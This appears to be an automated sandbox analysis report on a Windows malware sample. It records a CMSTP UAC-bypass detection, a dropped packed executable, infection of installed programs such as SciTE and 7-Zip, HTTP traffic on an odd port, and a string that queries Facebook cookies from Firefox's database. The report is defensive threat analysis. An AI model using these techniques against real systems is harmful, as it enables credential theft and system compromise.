Windows Analysis Report
65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: String function: 00BA5770 appears 31 times
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: String function: 00B32310 appears 34 times
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: String function: 00BF5F80 appears 31 times
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: String function: 00B17550 appears 48 times
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: String function: 00B17800 appears 134 times
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: String function: 00B182C0 appears 142 times

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 2052

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: Resource name: ZIP type: Zip archive data, at least v1.0 to extract, compression method=store
Source: MyProg.exe.6.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.0.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: MDSxhU.exe.4.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: MDSxhU.exe.4.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: MDSxhU.exe.4.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@10/23@6/5

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Code function: 6_2_00AD119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

6_2_00AD119F

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2876
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3212
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Mutant created: \Sessions\1\BaseNamedObjects\patatoes

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

File created: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: SELECT host,name,value,expiry FROM moz_cookies where host='.facebook.com';
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

ReversingLabs: Detection: 97%

Source: unknown	Process created: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe "C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe"
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Process created: C:\Users\user\AppData\Local\Temp\MDSxhU.exe C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 2052
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1524
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Process created: C:\Users\user\AppData\Local\Temp\MDSxhU.exe C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe	Jump to behavior

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Section loaded: netbios.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Static file information: File size 1803264 > 1048576

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x112400

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.6.dr

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Unpacked PE file: 6.2.MDSxhU.exe.ad0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: =Jcu

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: section name: .ottwaed
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: section name: .ottwaed
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: section name: =Jcu
Source: MDSxhU.exe.4.dr	Static PE information: section name: .aspack
Source: MDSxhU.exe.4.dr	Static PE information: section name: .adata
Source: SciTE.exe.6.dr	Static PE information: section name: u
Source: Uninstall.exe.6.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.6.dr	Static PE information: section name: PELIB
Source: MyProg.exe.6.dr	Static PE information: section name: Y\|uR

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: 4_2_00C1DEDB push ecx; ret	4_2_00C1DEEE
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Code function: 6_2_00AD1638 push dword ptr [00AD3084h]; ret	6_2_00AD170E
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Code function: 6_2_00AD600A push ebp; ret	6_2_00AD600D
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Code function: 6_2_00AD2D9B push ecx; ret	6_2_00AD2DAB
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Code function: 6_2_00AD6014 push 00AD14E1h; ret	6_2_00AD6425

Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Static PE information: section name: =Jcu entropy: 6.934615013255218
Source: MDSxhU.exe.4.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: SciTE.exe.6.dr	Static PE information: section name: u entropy: 6.935031443139661
Source: Uninstall.exe.6.dr	Static PE information: section name: EpNuZ entropy: 6.934849796226582
Source: MyProg.exe.6.dr	Static PE information: section name: Y\|uR entropy: 6.934121705107527

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	File created: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 799

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
